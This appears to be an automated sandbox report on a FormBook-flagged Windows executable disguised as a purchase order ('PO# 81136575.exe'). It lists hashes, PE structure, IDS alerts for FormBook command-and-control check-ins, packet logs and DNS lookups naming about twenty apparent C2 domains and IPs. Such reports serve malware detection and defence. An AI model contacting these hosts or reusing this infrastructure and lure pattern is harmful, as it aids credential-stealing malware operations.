                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2636
                                                                                                                                              Entropy (8bit):4.717623141423379
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTx:/ygGWEAokItULVDv
                                                                                                                                              MD5:6E3E756DF1EFD0768ADBB6812A348CF5
                                                                                                                                              SHA1:787F0C3B4A3D8C925F0CCAF20C15AF017FE4B9AC
                                                                                                                                              SHA-256:34981498D18865EE8F80E1F8F8F52706CE4ED88C795BFD9C71A4A6B17306F91D
                                                                                                                                              SHA-512:5D0B21074104C8999CD898CFE5457A29762FCEF0D47652CD5F79A065F9C0636A976A8EBDA4DCB149C74D0E3E59FE6EB33C5A645AC1E05C200580087604827DC4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt
                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Entropy (8bit):6.919411070401315
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                              File name:PO# 81136575.exe
                                                                                                                                              File size:1'565'184 bytes
                                                                                                                                              MD5:b353674e16431a7424571790d4d58f71
                                                                                                                                              SHA1:eb356ac3d93bc0a61bd38929c3bdb46bbf6c1315
                                                                                                                                              SHA256:1e474cdeeb0981210d4a74fd907bf35076bd839cdaed665bfcd6360557797895
                                                                                                                                              SHA512:73fedc917a39e32503e7dc559b16f583af1c77e77e63321da432c0210baee211abe0ab24a2341b5b42ac9ea3ce49bc4a0d2610ecfa8482775564554763857e3f
                                                                                                                                              SSDEEP:24576:Mkc92psKAq6ITV5vGbao8LSEI28qSN961kqiwu4H4444C:MkcYaKd6EGbrs4qSOGN4H4444C
                                                                                                                                              TLSH:2575AE002BE91964F3FA3EB89FB999568637FCE15832C65E043015CE4672B81ED62737
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G............."...P.................. ........@.. .......................@............`................................
                                                                                                                                              Icon Hash:98306e8c8cb6828c
                                                                                                                                              Entrypoint:0x56eebe
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x1283FA47 [Mon Nov 5 08:39:35 1979 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:4
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:4
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:4
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                              Instruction
                                                                                                                                              jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x16ee64         0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x170000         0x10cf0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x182000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type  Entropy              Characteristics
.text   0x2000           0x16cec4      0x16d000  af9c0355933fc931219da8c551a5aa3e  False     0.7365080532962329    data       7.089199817727075    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x170000         0x10cf0       0x10e00   9fc3825c990d6ecbc5b75691b4186dda  False     0.052300347222222224  data       1.3837080703783768   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x182000         0xc           0x200     d58dc0d75b1a43a80274fb4964d2560b  False     0.044921875           data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                 Language  Country  ZLIB Complexity
RT_ICON        0x1700e8  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 67584                      0.045353720572577784
RT_GROUP_ICON  0x180910  0x14     data                                                                                     1.25
RT_VERSION     0x180924  0x3cc    data                                                                                     0.43930041152263377
DLL          Import
mscoree.dll  _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-28T18:56:51.299445+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49715 | 172.67.149.53 | 80 | TCP
2024-11-28T18:57:16.148350+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49719 | 217.70.184.50 | 80 | TCP
2024-11-28T18:57:30.197189+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49723 | 43.153.84.190 | 80 | TCP
2024-11-28T18:57:44.673982+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49727 | 23.225.34.75 | 80 | TCP
2024-11-28T18:57:58.403418+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49731 | 104.21.53.93 | 80 | TCP
2024-11-28T18:58:12.156845+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49735 | 13.248.169.48 | 80 | TCP
2024-11-28T18:58:26.762980+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49739 | 161.97.168.245 | 80 | TCP
2024-11-28T19:00:35.727456+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49744 | 84.32.84.32 | 80 | TCP
2024-11-28T19:00:50.833474+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49748 | 208.91.197.27 | 80 | TCP
2024-11-28T19:01:05.738803+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49752 | 172.247.159.68 | 80 | TCP
2024-11-28T19:01:20.102885+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49756 | 172.172.168.240 | 80 | TCP
2024-11-28T19:01:34.500064+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49760 | 38.47.207.120 | 80 | TCP
2024-11-28T19:01:48.567273+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49764 | 192.185.16.209 | 80 | TCP
2024-11-28T19:02:13.153245+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49765 | 172.67.149.53 | 80 | TCP
2024-11-28T19:02:27.284955+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49769 | 217.70.184.50 | 80 | TCP
                                                                                                                                              Nov 28, 2024 19:02:13.153018951 CET8049765172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:13.153244972 CET4976580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 19:02:13.154499054 CET4976580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 19:02:13.311158895 CET8049765172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.172293901 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:18.473951101 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.474169970 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:18.481478930 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:18.783077002 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.785362005 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.785432100 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.785617113 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:19.982295036 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:20.999771118 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:21.301629066 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.301868916 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:21.309232950 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:21.611066103 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.611957073 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.611989975 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.612261057 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:22.825443029 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:23.842914104 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.144526958 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.144690990 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.152230024 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.152314901 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.152358055 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.454066038 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454137087 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454165936 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454195976 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454225063 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454530954 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.456875086 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.456921101 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.457097054 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:25.652913094 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:26.670499086 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:26.972120047 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:26.972338915 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:26.977296114 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.278995037 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284579992 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284636021 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284667969 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284699917 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284955025 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.284955025 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.288223028 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.589781046 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.294267893 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:32.467453003 CET804977043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.467664003 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:32.475155115 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:32.648438931 CET804977043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.648485899 CET804977043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.648705006 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:33.979247093 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:34.998092890 CET4977180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:35.171233892 CET804977143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:35.171381950 CET4977180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:35.178930044 CET4977180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:35.352215052 CET804977143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:35.352232933 CET804977143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:35.352497101 CET4977180192.168.11.2043.153.84.190
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 28, 2024 18:56:48.689481020 CET  49160        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:56:48.869124889 CET  53           49160      1.1.1.1         192.168.11.20
Nov 28, 2024 18:57:06.334657907 CET  59232        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:57:07.012403965 CET  53           59232      1.1.1.1         192.168.11.20
Nov 28, 2024 18:57:21.160609007 CET  60099        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:57:21.699548006 CET  53           60099      1.1.1.1         192.168.11.20
Nov 28, 2024 18:57:35.203305006 CET  50350        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:57:36.216367006 CET  50350        53         192.168.11.20   9.9.9.9
Nov 28, 2024 18:57:36.237030029 CET  53           50350      1.1.1.1         192.168.11.20
Nov 28, 2024 18:57:36.708849907 CET  53           50350      9.9.9.9         192.168.11.20
Nov 28, 2024 18:57:49.685553074 CET  55365        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:57:49.868767023 CET  53           55365      1.1.1.1         192.168.11.20
Nov 28, 2024 18:58:03.415848017 CET  53895        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:58:03.599015951 CET  53           53895      1.1.1.1         192.168.11.20
Nov 28, 2024 18:58:17.164695024 CET  54166        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:58:17.649842024 CET  53           54166      1.1.1.1         192.168.11.20
Nov 28, 2024 18:58:31.784601927 CET  51354        53         192.168.11.20   1.1.1.1
Nov 28, 2024 18:58:32.022288084 CET  53           51354      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:04.343755007 CET  58817        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:04.525433064 CET  53           58817      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:12.577594042 CET  50062        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:13.588139057 CET  50062        53         192.168.11.20   9.9.9.9
Nov 28, 2024 19:00:14.603526115 CET  50062        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:16.618680954 CET  50062        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:16.618680954 CET  50062        53         192.168.11.20   9.9.9.9
Nov 28, 2024 19:00:17.410501003 CET  53           50062      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:17.410537958 CET  53           50062      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:17.410562992 CET  53           50062      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:17.418317080 CET  50062        53         192.168.11.20   9.9.9.9
Nov 28, 2024 19:00:18.431832075 CET  55564        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:18.471460104 CET  53           50062      9.9.9.9         192.168.11.20
Nov 28, 2024 19:00:18.590301037 CET  53           55564      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:18.591193914 CET  55564        53         192.168.11.20   9.9.9.9
Nov 28, 2024 19:00:18.754657030 CET  53           55564      9.9.9.9         192.168.11.20
Nov 28, 2024 19:00:19.632174969 CET  53           50062      9.9.9.9         192.168.11.20
Nov 28, 2024 19:00:25.792195082 CET  59217        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:26.002559900 CET  53           59217      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:40.742837906 CET  57882        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:40.965419054 CET  53           57882      1.1.1.1         192.168.11.20
Nov 28, 2024 19:00:56.242736101 CET  50175        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:00:56.440644026 CET  53           50175      1.1.1.1         192.168.11.20
Nov 28, 2024 19:01:10.749927044 CET  57188        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:01:11.390691996 CET  53           57188      1.1.1.1         192.168.11.20
Nov 28, 2024 19:01:25.122051954 CET  60792        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:01:25.311614037 CET  53           60792      1.1.1.1         192.168.11.20
Nov 28, 2024 19:01:39.509836912 CET  54293        53         192.168.11.20   1.1.1.1
Nov 28, 2024 19:01:39.822860956 CET  53           54293      1.1.1.1         192.168.11.20
Timestamp                            Source IP       Dest IP   Trans ID  OP Code             Name                      Type            Class        DNS over HTTPS
Nov 28, 2024 18:56:48.689481020 CET  192.168.11.20   1.1.1.1   0xdd65    Standard query (0)  www.1win-moldovia.fun     A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:57:06.334657907 CET  192.168.11.20   1.1.1.1   0x1f03    Standard query (0)  www.akravchenko.dev       A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:57:21.160609007 CET  192.168.11.20   1.1.1.1   0xa31d    Standard query (0)  www.hubeisuizhou.net      A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:57:35.203305006 CET  192.168.11.20   1.1.1.1   0x4000    Standard query (0)  www.bashei.top            A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:57:36.216367006 CET  192.168.11.20   9.9.9.9   0x4000    Standard query (0)  www.bashei.top            A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:57:49.685553074 CET  192.168.11.20   1.1.1.1   0xc171    Standard query (0)  www.gfdgdfery.xyz         A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:58:03.415848017 CET  192.168.11.20   1.1.1.1   0x9259    Standard query (0)  www.healthsolutions.top   A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:58:17.164695024 CET  192.168.11.20   1.1.1.1   0xf8f     Standard query (0)  www.affilamark.buzz       A (IP address)  IN (0x0001)  false
Nov 28, 2024 18:58:31.784601927 CET  192.168.11.20   1.1.1.1   0xecd9    Standard query (0)  www.shedoes.top           A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:04.343755007 CET  192.168.11.20   1.1.1.1   0xd36b    Standard query (0)  www.torkstallningar.shop  A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:12.577594042 CET  192.168.11.20   1.1.1.1   0x1763    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:13.588139057 CET  192.168.11.20   9.9.9.9   0x1763    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:14.603526115 CET  192.168.11.20   1.1.1.1   0x1763    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:16.618680954 CET  192.168.11.20   1.1.1.1   0x1763    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:16.618680954 CET  192.168.11.20   9.9.9.9   0x1763    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:17.418317080 CET  192.168.11.20   9.9.9.9   0x1763    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:18.431832075 CET  192.168.11.20   1.1.1.1   0x4f64    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:18.591193914 CET  192.168.11.20   9.9.9.9   0x4f64    Standard query (0)  www.aflaksokna.com        A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:25.792195082 CET  192.168.11.20   1.1.1.1   0xbcd3    Standard query (0)  www.claudpinheiro.online  A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:40.742837906 CET  192.168.11.20   1.1.1.1   0xac55    Standard query (0)  www.slwmarketing.online   A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:00:56.242736101 CET  192.168.11.20   1.1.1.1   0xbee3    Standard query (0)  www.56435.net             A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:01:10.749927044 CET  192.168.11.20   1.1.1.1   0x6e28    Standard query (0)  www.tekilla.wtf           A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:01:25.122051954 CET  192.168.11.20   1.1.1.1   0x8347    Standard query (0)  www.tyai36.top            A (IP address)  IN (0x0001)  false
Nov 28, 2024 19:01:39.509836912 CET  192.168.11.20   1.1.1.1   0x8ff5    Standard query (0)  www.homebizsuccess.blog   A (IP address)  IN (0x0001)  false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2024 18:56:48.869124889 CET | 1.1.1.1 | 192.168.11.20 | 0xdd65 | No error (0) | www.1win-moldovia.fun | | 172.67.149.53 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:56:48.869124889 CET | 1.1.1.1 | 192.168.11.20 | 0xdd65 | No error (0) | www.1win-moldovia.fun | | 104.21.47.164 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:57:07.012403965 CET | 1.1.1.1 | 192.168.11.20 | 0x1f03 | No error (0) | www.akravchenko.dev | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 18:57:07.012403965 CET | 1.1.1.1 | 192.168.11.20 | 0x1f03 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:57:21.699548006 CET | 1.1.1.1 | 192.168.11.20 | 0xa31d | No error (0) | www.hubeisuizhou.net | | 43.153.84.190 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:57:36.237030029 CET | 1.1.1.1 | 192.168.11.20 | 0x4000 | No error (0) | www.bashei.top | | 23.225.34.75 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:57:36.708849907 CET | 9.9.9.9 | 192.168.11.20 | 0x4000 | No error (0) | www.bashei.top | | 23.225.34.75 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:57:49.868767023 CET | 1.1.1.1 | 192.168.11.20 | 0xc171 | No error (0) | www.gfdgdfery.xyz | | 104.21.53.93 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:57:49.868767023 CET | 1.1.1.1 | 192.168.11.20 | 0xc171 | No error (0) | www.gfdgdfery.xyz | | 172.67.211.54 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:58:03.599015951 CET | 1.1.1.1 | 192.168.11.20 | 0x9259 | No error (0) | www.healthsolutions.top | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:58:03.599015951 CET | 1.1.1.1 | 192.168.11.20 | 0x9259 | No error (0) | www.healthsolutions.top | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:58:17.649842024 CET | 1.1.1.1 | 192.168.11.20 | 0xf8f | No error (0) | www.affilamark.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 18:58:32.022288084 CET | 1.1.1.1 | 192.168.11.20 | 0xecd9 | No error (0) | www.shedoes.top | | 162.0.239.141 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:04.525433064 CET | 1.1.1.1 | 192.168.11.20 | 0xd36b | Name error (3) | www.torkstallningar.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:17.410501003 CET | 1.1.1.1 | 192.168.11.20 | 0x1763 | Server failure (2) | www.aflaksokna.com | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:17.410537958 CET | 1.1.1.1 | 192.168.11.20 | 0x1763 | Server failure (2) | www.aflaksokna.com | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:17.410562992 CET | 1.1.1.1 | 192.168.11.20 | 0x1763 | Server failure (2) | www.aflaksokna.com | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:18.471460104 CET | 9.9.9.9 | 192.168.11.20 | 0x1763 | Server failure (2) | www.aflaksokna.com | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:18.590301037 CET | 1.1.1.1 | 192.168.11.20 | 0x4f64 | Server failure (2) | www.aflaksokna.com | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:18.754657030 CET | 9.9.9.9 | 192.168.11.20 | 0x4f64 | Server failure (2) | www.aflaksokna.com | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:19.632174969 CET | 9.9.9.9 | 192.168.11.20 | 0x1763 | Server failure (2) | www.aflaksokna.com | none | none | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:26.002559900 CET | 1.1.1.1 | 192.168.11.20 | 0xbcd3 | No error (0) | www.claudpinheiro.online | claudpinheiro.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 19:00:26.002559900 CET | 1.1.1.1 | 192.168.11.20 | 0xbcd3 | No error (0) | claudpinheiro.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:40.965419054 CET | 1.1.1.1 | 192.168.11.20 | 0xac55 | No error (0) | www.slwmarketing.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:00:56.440644026 CET | 1.1.1.1 | 192.168.11.20 | 0xbee3 | No error (0) | www.56435.net | | 172.247.159.68 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:01:11.390691996 CET | 1.1.1.1 | 192.168.11.20 | 0x6e28 | No error (0) | www.tekilla.wtf | redirect.3dns.box | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 19:01:11.390691996 CET | 1.1.1.1 | 192.168.11.20 | 0x6e28 | No error (0) | redirect.3dns.box | | 172.172.168.240 | A (IP address) | IN (0x0001) | false
